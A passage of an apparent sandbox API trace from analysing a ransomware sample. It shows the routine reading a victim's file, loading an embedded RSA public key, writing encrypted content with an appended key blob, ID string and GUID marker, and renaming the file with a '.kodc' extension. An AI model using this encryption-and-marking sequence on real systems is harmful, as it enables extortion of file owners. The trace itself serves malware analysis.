lpDistanceToMoveHigh=0x0) returned 0x0 [0102.029] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9e2fb70, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb70*=0xfb77, lpOverlapped=0x0) returned 1 [0102.030] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0102.030] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f1) returned 0x32d2a78 [0102.030] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0102.030] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0102.030] CryptAcquireContextW (in: phProv=0x9e2fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9e2fa50*=0x693158) returned 1 [0102.031] CryptCreateHash (in: hProv=0x693158, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9e2fa58 | out: phHash=0x9e2fa58) returned 1 [0102.031] CryptHashData (hHash=0x3331bc8, pbData=0x32d2a78, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0102.031] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x0, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9e2fa54) returned 1 [0102.031] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x32adf00 [0102.031] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x32adf00, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x32adf00, pdwDataLen=0x9e2fa54) returned 1 [0102.031] GetLastError () returned 0x0 [0102.031] CryptDestroyHash (hHash=0x3331bc8) returned 1 [0102.031] CryptReleaseContext (hProv=0x693158, dwFlags=0x0) returned 1 [0102.031] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0102.032] UuidCreate (in: Uuid=0x9e2fa48 | out: Uuid=0x9e2fa48) returned 0x0 [0102.032] UuidToStringA (in: Uuid=0x9e2fa48, StringUuid=0x9e2fa40 | out: StringUuid=0x9e2fa40) returned 0x0 [0102.032] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0102.032] RpcStringFreeA (in: String=0x9e2fa40 | out: String=0x9e2fa40) returned 0x0 [0102.032] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0102.032] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0102.033] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xfb80) returned 0x9bc8968 [0102.033] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0102.033] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0102.033] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32cc1c0 [0102.033] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0102.034] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32d2a78 [0102.034] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338fa8 [0102.034] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9bb6670 [0102.034] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb8220 [0102.034] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9bb66b8 [0102.034] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb8238 [0102.034] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb8268 [0102.034] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb79c8 [0102.034] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb8280 [0102.034] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x334ce70 [0102.034] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x9b9f078 [0102.034] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x9b9f078, Size=0x218) returned 0x32cef08 [0102.034] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x694598 [0102.034] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb8268 | out: hHeap=0x630000) returned 1 [0102.034] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb8280 | out: hHeap=0x630000) returned 1 [0102.034] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb79c8 | out: hHeap=0x630000) returned 1 [0102.034] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x334ce70 | out: hHeap=0x630000) returned 1 [0102.035] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x694598 | out: hHeap=0x630000) returned 1 [0102.035] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb79c8 [0102.035] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32ceca0 [0102.035] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x9bb8280 [0102.035] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32aed00 [0102.035] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x9bb8268 [0102.035] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cecc0 [0102.035] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x9b8c428 [0102.035] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fc30 [0102.035] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338dc8 [0102.035] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adf00 [0102.035] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x9b8c540 [0102.035] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adee0 [0102.035] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0102.035] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c428 | out: hHeap=0x630000) returned 1 [0102.035] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb8280 | out: hHeap=0x630000) returned 1 [0102.036] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0102.036] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb8268 | out: hHeap=0x630000) returned 1 [0102.036] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32aed00 | out: hHeap=0x630000) returned 1 [0102.036] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0102.036] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb79c8 | out: hHeap=0x630000) returned 1 [0102.036] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fc30 | out: hHeap=0x630000) returned 1 [0102.036] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338fa8 | out: hHeap=0x630000) returned 1 [0102.036] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0102.036] GetCurrentThreadId () returned 0x42c [0102.036] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69b948 [0102.036] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x332ca68 [0102.036] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x3316db8 [0102.036] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x693158 [0102.036] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x3298d18 [0102.036] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0102.036] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0102.036] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bd68 [0102.036] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0102.036] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0102.036] GetCurrentThreadId () returned 0x42c [0102.036] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0102.036] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0102.036] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x32b14c8 [0102.036] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0102.036] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0102.036] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0102.037] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0102.037] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b14c8 | out: hHeap=0x630000) returned 1 [0102.037] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69ba50 [0102.037] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0102.037] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x3318138 [0102.037] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0102.037] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69be70 [0102.037] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0102.037] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb79c8 [0102.037] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0102.037] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0102.037] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec60 [0102.037] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecb0 [0102.037] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec50 [0102.037] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0102.037] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec80 [0102.037] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0102.037] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb8268 [0102.037] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec60 | out: hHeap=0x630000) returned 1 [0102.037] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec60 [0102.037] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0102.037] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0102.037] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec70 [0102.037] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ced00 [0102.037] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cece0 [0102.037] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb8280 [0102.038] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ced00 | out: hHeap=0x630000) returned 1 [0102.038] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32aed00 [0102.038] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec70 | out: hHeap=0x630000) returned 1 [0102.038] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb8250 [0102.038] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cece0 | out: hHeap=0x630000) returned 1 [0102.038] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a10 [0102.038] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0102.038] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a28 [0102.038] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecb0 | out: hHeap=0x630000) returned 1 [0102.038] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a40 [0102.038] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec80 | out: hHeap=0x630000) returned 1 [0102.038] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x9bb8298 [0102.038] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a40 | out: hHeap=0x630000) returned 1 [0102.039] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x9bb7a40 [0102.039] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a28 | out: hHeap=0x630000) returned 1 [0102.039] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec80 [0102.039] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0102.039] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32ad2c0 [0102.039] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec80 | out: hHeap=0x630000) returned 1 [0102.039] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32ad520 [0102.039] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb8268 | out: hHeap=0x630000) returned 1 [0102.039] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb8268 [0102.039] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec60 | out: hHeap=0x630000) returned 1 [0102.039] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x204) returned 0x9b96968 [0102.039] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb79c8 | out: hHeap=0x630000) returned 1 [0102.039] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c428 [0102.039] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a40 | out: hHeap=0x630000) returned 1 [0102.039] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x210) returned 0x32cef08 [0102.039] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad520 | out: hHeap=0x630000) returned 1 [0102.039] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10c) returned 0x9b8c658 [0102.039] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec50 | out: hHeap=0x630000) returned 1 [0102.040] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c770 [0102.040] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb8268 | out: hHeap=0x630000) returned 1 [0102.040] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x9b9c950 [0102.040] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c428 | out: hHeap=0x630000) returned 1 [0102.040] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bc60 [0102.040] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0102.040] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x693158 | out: hHeap=0x630000) returned 1 [0102.040] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69ba50 | out: hHeap=0x630000) returned 1 [0102.040] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69bc60 | out: hHeap=0x630000) returned 1 [0102.040] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad2c0 | out: hHeap=0x630000) returned 1 [0102.040] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c770 | out: hHeap=0x630000) returned 1 [0102.040] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0102.040] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b9c950 | out: hHeap=0x630000) returned 1 [0102.040] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c658 | out: hHeap=0x630000) returned 1 [0102.040] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0102.040] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb8298 | out: hHeap=0x630000) returned 1 [0102.040] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0102.040] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a10 | out: hHeap=0x630000) returned 1 [0102.040] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32aed00 | out: hHeap=0x630000) returned 1 [0102.040] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb8280 | out: hHeap=0x630000) returned 1 [0102.041] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb8250 | out: hHeap=0x630000) returned 1 [0102.041] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3298d18 | out: hHeap=0x630000) returned 1 [0102.041] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3316db8 | out: hHeap=0x630000) returned 1 [0102.041] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69bd68 | out: hHeap=0x630000) returned 1 [0102.041] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb8238 | out: hHeap=0x630000) returned 1 [0102.041] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb66b8 | out: hHeap=0x630000) returned 1 [0102.041] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b96968 | out: hHeap=0x630000) returned 1 [0102.041] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69be70 | out: hHeap=0x630000) returned 1 [0102.041] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3318138 | out: hHeap=0x630000) returned 1 [0102.041] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c540 | out: hHeap=0x630000) returned 1 [0102.041] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adf00 | out: hHeap=0x630000) returned 1 [0102.041] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0102.041] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adee0 | out: hHeap=0x630000) returned 1 [0102.041] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338dc8 | out: hHeap=0x630000) returned 1 [0102.041] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0102.041] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0102.041] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cc1c0 | out: hHeap=0x630000) returned 1 [0102.041] WriteFile (in: hFile=0x5cc, lpBuffer=0x9bc8968*, nNumberOfBytesToWrite=0xfb72, lpNumberOfBytesWritten=0x9e2fb14, lpOverlapped=0x0 | out: lpBuffer=0x9bc8968*, lpNumberOfBytesWritten=0x9e2fb14*=0xfb72, lpOverlapped=0x0) returned 1 [0102.042] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bc8968 | out: hHeap=0x630000) returned 1 [0102.042] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xfb77, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0102.042] WriteFile (in: hFile=0x5cc, lpBuffer=0x69b948*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x69b948*, lpNumberOfBytesWritten=0x9e2fb50*=0x100, lpOverlapped=0x0) returned 1 [0102.042] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69b948 | out: hHeap=0x630000) returned 1 [0102.042] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce5b0 [0102.042] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x428) returned 0x9b9c950 [0102.042] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x9b9c950, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0102.042] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x430) returned 0x694598 [0102.042] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b9c950 | out: hHeap=0x630000) returned 1 [0102.043] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce5b0 | out: hHeap=0x630000) returned 1 [0102.043] WriteFile (in: hFile=0x5cc, lpBuffer=0x694598*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x694598*, lpNumberOfBytesWritten=0x9e2fb50*=0x28, lpOverlapped=0x0) returned 1 [0102.043] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x694598 | out: hHeap=0x630000) returned 1 [0102.043] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0102.043] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9e2fb50*=0x26, lpOverlapped=0x0) returned 1 [0102.043] CloseHandle (hObject=0x5cc) returned 1 [0102.045] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x32c9230 [0102.045] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8a0) returned 0x9bb8980 [0102.045] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32c9230 | out: hHeap=0x630000) returned 1 [0102.045] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vzirrPIdRoa4G1GJ\\eS_6wkd7jpEVWnFA.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vzirrpidroa4g1gj\\es_6wkd7jpevwnfa.mp3"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vzirrPIdRoa4G1GJ\\eS_6wkd7jpEVWnFA.mp3.kodc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vzirrpidroa4g1gj\\es_6wkd7jpevwnfa.mp3.kodc")) returned 1 [0102.046] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb8980 | out: hHeap=0x630000) returned 1 [0102.046] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0102.046] VirtualFree (lpAddress=0x21b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0102.095] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b2de0 | out: hHeap=0x630000) returned 1 [0102.095] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe9b77c70, ftCreationTime.dwHighDateTime=0x1d5be13, ftLastAccessTime.dwLowDateTime=0x5ee66190, ftLastAccessTime.dwHighDateTime=0x1d5bc80, ftLastWriteTime.dwLowDateTime=0x5ee66190, ftLastWriteTime.dwHighDateTime=0x1d5bc80, nFileSizeHigh=0x0, nFileSizeLow=0x1e44, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="G4Lm5aAbySbM65.wav", cAlternateFileName="G4LM5A~1.WAV")) returned 1 [0102.095] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x332da38 [0102.095] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa6) returned 0x32b2de0 [0102.095] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332da38 | out: hHeap=0x630000) returned 1 [0102.095] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vzirrPIdRoa4G1GJ\\G4Lm5aAbySbM65.wav") returned=".wav" [0102.096] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS 